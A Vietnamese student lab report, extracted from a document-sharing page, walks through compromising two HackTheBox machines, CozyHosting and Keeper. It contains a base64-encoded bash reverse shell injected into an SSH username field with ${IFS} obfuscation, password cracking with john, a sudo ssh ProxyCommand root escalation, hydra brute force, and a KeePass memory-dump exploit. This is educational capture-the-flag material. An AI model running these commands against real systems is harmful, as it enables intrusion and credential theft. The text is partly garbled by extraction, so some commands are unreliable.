Trang 1 HỌC VIỆN CÔNG NGHỆ BƯU CHÍNH VIỄN THƠNGKHOA AN TỒN THƠNG TINBáo cáo làm lab hackthebox Người thực hiện: Phạm Khánh Hưng Mã sinh viên: B19DCAT096 Trang 3 1 CozyHostingIp target:
HỌC VIỆN CƠNG NGHỆ BƯU CHÍNH VIỄN THƠNG KHOA AN TỒN THƠNG TIN Báo cáo làm lab hackthebox Người thực hiện: Phạm Khánh Hưng Mã sinh viên: B19DCAT096 Hà Nội, Tháng 11 năm 2023 Mục lục CozyHosting Enumiration Initial access Privilege Escalation: Lab Keeper 13 13 Enumination 13 Initial access 15 Privilege Escalation: 18 CozyHosting Ip target: 10.10.11.230 Enumiration Quét target nmap: sudo openvpn lab_hungdaica.ovpn: Để kết nối đến server sudo nmap -sC -sV -O 10.10.11.230 -A -T4 -Pn Các cổng mở 22/open, 80/open, 8000/open, 8083/open Thêm ip cozyhosting vào /etc/hosts truy cập vào cozyhosting.htb Initial access Ở có chức login có khả khai thác tiếp - Dùng dirseach để tìm kiếm thêm đường dẫn dirsearch -u http://cozyhosting.htb Trong trình tìm kiếm tìm thư mục chứa Jessesionid người dùng Truy cập vào đường dẫn Ta thấy sessionid người dùng tên kanderson Vì có gắng đăng nhập cách thay sessionid sessionid kanderson Và đăng nhập thành công tài khoản admin kanderson Trên trang ta thấy có chức chạy kết nối ssh với người dung Ở ta cung cấp thử tên máy chủ 127.0.0.1 khơng có tên người dùng dùng burp để xem response trả trợ giúp với lệnh ssh Document continues below Discover more An toàn ứng from: dụng web c… AT2021 Học viện Công ng… 291 documents Go to course Toan Cao Cap A1 Học 146 viện CN Bưu chính… An tồn ứng dụng… 100% (8) tham khảo gdqp học 12 phần - có sẵn đáp… An toàn ứng dụng… 100% (5) Tactics toeic audio 17 46 scripts An toàn ứng dụng… 100% (5) TA1-K61Supplementary… An toàn ứng dụng… 100% (5) Dump Splunk Sale 11 Rep - ưedsfg An toàn ứng dụn… 88% (24) CDT1429 Thiet Ke 217 Web Co Ban Baigia… An toàn ứng dụng… 100% (3) Và thêm tên người dùng test’ kết xảy lỗi với “/bin/bash -c” Bây tạo payload cho riêng https://book.hacktricks.xyz/v/fr/linux-hardening/bypass-bash-restrictions YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4zMy8xNDU2IDA+JjEK ;echo${IFS%??}"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4zMy8xND U2IDA+JjEK "${IFS%??}|${IFS%??}base64${IFS%??}d${IFS%??}|${IFS%??}bash; Bật netcat cổng 1456 để lắng nghe ta truy cập vào ssh mục tiêu có reverse shell python3 -c 'import pty;pty.spawn("/bin/bash")' export TERM=xterm ctrl + z stty raw -echo; fg Tạo đường dẫn mở lại cần thiết python3 -m http.server 5555 Ở máy kali nhập: wget http://10.10.11.230:5555/cloudhosting-0.0.1-jar Để tải file máy Mở tệp jd-gui lấy tên người dùng mật sở liệu PostgreSQL jd-gui cloudhosting-0.0.1.jar spring.datasource.username=postgres spring.datasource.password=Vg&nvzAQ7XxR Tiến hành đăng nhập vào PostgreSQL database sử dụng tài khoản mật lất \c cozyhosting \d Select * from users; Ta lấy mã hash mật tài khoản admin Copy mã hash file hash dùng john để crack mật john hash.txt wordlist=/usr/share/wordlists/rockyou.txt Mật manchesterunited Xem file /etc/passwd để xem tài khoản Và có tài khoản josh SSH vào tài khoản josh Lấy flag user.txt Privilege Escalation: Ta thấy /user/bin/ssh có quyền root Vậy ta Privilege Escalation payload đơn giản GTFOBINS cho phép lấy shell root sudo ssh -o ProxyCommand=';sh 0&2' x Có quyền root ta lấy flag root.txt thư mục root Lab Keeper IP target: 10.10.11.227 Enumination Thực quét nmap: nmap 10.10.11.227 -sCV Ta thấy cổng 22/open, 80/open Thêm đường dẫn tickets.keeper.htb vào /etc/hosts Truy cập vào trang đích cổng 80 Initial access Ta thấy có chức đăng nhập dùng request tracker Search: request tracker default credentials mật mặc định: root/password Và đăng nhập thành công, khơng ta bruteforce attack hydra : hydra -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou txt -u -f ticket.keeper.htb httppost-form Vào admin/user thấy có user root inorgaard Thấy mật lnorgaard Welcome2023! Vì port 22 nên ta thử ssh vào vs tài khoản mật xem Truy cập vào terminal lấy flag user.txt Privilege Escalation: Mở server http port 4444 lên tiến hành tải file để tiến hành truy khai thác wget http://10.10.11.227:4444/KeePassDumpFull.dmp wget http://10.10.11.227:4444/poc.py wget http://10.10.11.227:4444/passcodes.kdbx Ta thấy có tệp poc.py( bên trước để lại khai thác lỗ hổng cve-202332784/keepass-dump-masterkey), tệp dmp (có thể khai thác để lấy mật khẩu), tệp sở liệu kdbx( KeePass lấy nhiều thông tin quan trọng) https://github.com/CMEPW/keepass-dump-masterkey?source=post_page 7b1d8fe8a56a Chạy thử poc.py ta mật khẩu: rødgrød med fløde( tra mạng đốn vài ký tự bị mã hóa đi) Sau mở file dmp keepassxc ( cài lệnh apt install keepassxc) Ở ta thấy key ssh putty Sao chép khóa vào file key.ppk đồng thời tạo tệp key.pem có liên quan cấp cho quyền đọc ghi sudo puttygen key.ppk -O private-openssh -o key.pem Lệnh chuyển khóa riêng từ dạng putty sang định dạng openssh để ta ssh Cuối ta dùng key private để kết nối ssh root thành cơng lấy flag root.txt More from: An toàn ứng dụng web c… AT2021 Học viện Công… 291 documents Go to course 146 Toan Cao Cap A1 Học viện CN Bưu chính… An tồn ứng dụng… 100% (8) tham khảo gdqp học 12 17 46 phần - có sẵn đáp… An toàn ứng dụng… 100% (5) Tactics toeic audio scripts An toàn ứng dụng… 100% (5) TA1-K61Supplementary… An toàn ứng dụng… 100% (5) Recommended for you 12 46 17 11 Email Security for Financial Institutions An toàn ứng dụng… 100% (1) TA1-K61Supplementary… An toàn ứng dụng… 100% (5) Tactics toeic audio scripts An toàn ứng dụng… 100% (5) Dump Splunk Sale Rep - ưedsfg An toàn ứng dụn… 88% (24)